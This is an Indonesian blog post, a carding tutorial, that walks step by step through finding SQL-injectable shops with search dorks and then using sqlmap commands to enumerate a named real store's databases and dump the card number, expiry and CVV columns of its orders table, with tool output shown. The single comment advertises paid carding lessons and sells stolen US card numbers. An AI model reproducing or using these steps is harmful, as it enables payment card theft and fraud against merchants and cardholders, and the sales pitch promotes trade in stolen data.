Friday, March 28, 2014

TUTORIAL CARDING ( WITH CARDING DORK & SQLMAP KALI LINUX)

1 comments

Ok Langsung Aja Ke Tkp


1. sqlmap
2. dork carding (download)

3. sqli scanner :

Pertama ,ambil dork lalu scan menggunakan sqli scanner :




Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="


Nah, web tersebut error saat kita inject ,



Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u (Url) --dbs

Disini kita mendapatkan 3 database :

[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema


Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap.py -u (url) -D namadatabase --tables ( disini saya coba database "balboast_gkgcart" )


nah, saya dapat tables nya :



Database: balboast_gkgcart                                                                                                                                                                     
[88 tables]
+-----------------------+
| amanu                 |
| categories            |
| clients               |
| components            |
| config                |
| config_groups         |
| customers             |
| form_data             |
| form_fields           |
| forms                 |
| geo                   |
| groups                |
| item_amanu            |
| item_cat              |
| item_files            |
| item_files_customer   |
| item_options          |
| item_options_linked   |
| item_options_values   |
| item_related          |
| item_thread           |
| item_thread_old       |
| items                 |
| items_addphoto        |
| items_item_files      |
| items_packages        |
| languages             |
| logs                  |
| mailinglist           |
| mailinglist_cat       |
| mailinglist_members   |
| manu                  |
| news                  |
| news_cat              |
| news_news_cat         |
| orders                |
| photos                |
| photos_cat            |
| pic_gallery           |
| ship_prices           |
| ship_zones            |
| sites                 |
| sites_components      |
| thread                |
| thread_gel            |
| thread_items          |
| ups                   |
| ups_packaging         |
| ups_pickup            |
| ups_service           |
| ups_units             |
| users                 |
| users_access          |
| users_groups          |
| users_spu             |
| users_spu_values      |
| zones                 |
+-----------------------+

[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'

Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns

Maka akan muncul seperti ini : 




Table: orders
[18 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| cart_id         | varchar(15) |
| cc_ex_month     | tinyint(4)  |
| cc_ex_year      | int(11)     |
| cc_number       | varchar(30) |
| cc_type         | varchar(20) |
| customer_id     | int(11)     |
| cvv2            | varchar(20) |
| date            | datetime    |
| id              | int(11)     |
| ipaddress       | varchar(25) |
| payment_method  | varchar(15) |
| shipping        | float(8,2)  |
| shipping_method | varchar(5)  |
| status          | tinyint(4)  |
| subtotal        | float(8,2)  |
| tax             | float(8,2)  |
| text            | text        |
| total           | float(8,2)  |
+-----------------+-------------+


Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump

contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .




Semoga bermanfaat :)

One Response so far

  1. OPen Carding Learning


    ========================
    Paket 1 (Gold)
    Harga : 300.000,-
    Sudah termasuk :
    ~ Belajar Sampai Bisa + sampe jual result + barang sampe rumah
    ~ Mendapat DORK VVIP + cara pengembangan dork
    ~ Tools sudah dikemas lengkap
    ~ Mendapat Contoh Target
    ~ Belajar Sampai bisa bukan hanya disekolah , disini juga bisa
    ~ Free 1 CC Buat lu (terserah mau lu apain/ikut tutor order ane)
    ~ need vpn? HMA = 1 bulan 60.000,-
    6 bulan 200.000,- (Free? vpn yang aman yang berbayar, )
    VIP72 = 2 minggu 100.000,-
    2 bulan 250.000,- (Vip 72 Recomended)

    ========================
    Paket 2 (Premium)
    Harga : 400.000,-
    Termasuk :
    ~ so pasti sampe bisa,.. malahan sampe order barang
    ~ Dapat 1000 mail-list buat lu coba, fresh ane pesenin ke tukang dumper profesional
    ~ Smtp Free
    ~ Tools lengkap
    ~ HWM Cpanel full tutor
    ~ Vpn? so pasti,. liat harga dipaket 1
    ~ Tips Trick agar domain lama suspend

    ========================

    Banyak yang ngaku"in dirinya Recomended, no tipu" segala,..
    padahal itu cuman kedok aja biar dipercaya
    hati",.. sedikit seller yang ngasi tahu begituan
    pas ketemu seller yang asli recomended jangan disia" in
    ntar nyesel lu

    Join = lu jadi Keluarga kami, bagian dari kami dan masuk forum Vip (yng penting aktif)
    nggk aktif juga gpp, tapi ruginya ke elu


    berMinat?
    Hubungi wa : 081536668154
    Id LINE :yoy2331

    Udah dapat banyak duit dan males nyari CC?
    ane ada jual,..
    CC US 60k/biji ( banyak stock, bosen liatnya )
    Selain US 80k/biji

    kOIN LINE? ADA JUga
    http://prnt.sc/efzqng
    tuh 3.200 koin (300k pulsa) mahal? cari aja diluar sana banyak murah :v #hati" ketipu

    Hotel/Maskapai Rate 50% .

    Pembelajaran via teamviewer dan camfrog
    belajar dengan Jadwal dan Serentak, Usahakan Luangkan waktu untuk aktif pada jadwalnya
    ketinggalan bukan brrti nggk dapat belajar,. tapi kehilangan trik" vip++
    2-3 minggu udah pasti menghAsilkan

    Mau lihat kualitas pelayanan kami?
    Join Sekarang,. member Terbatas untuk 5 orang,. kebanyakan ntar ada yang bocor dan mudah ketcyduck (fuck)
    MAHAL?? cek tempat lain yang lebih murah,. belum lagi kena tipu"
    Ragu = Nggk usah Dicoba

Leave a Reply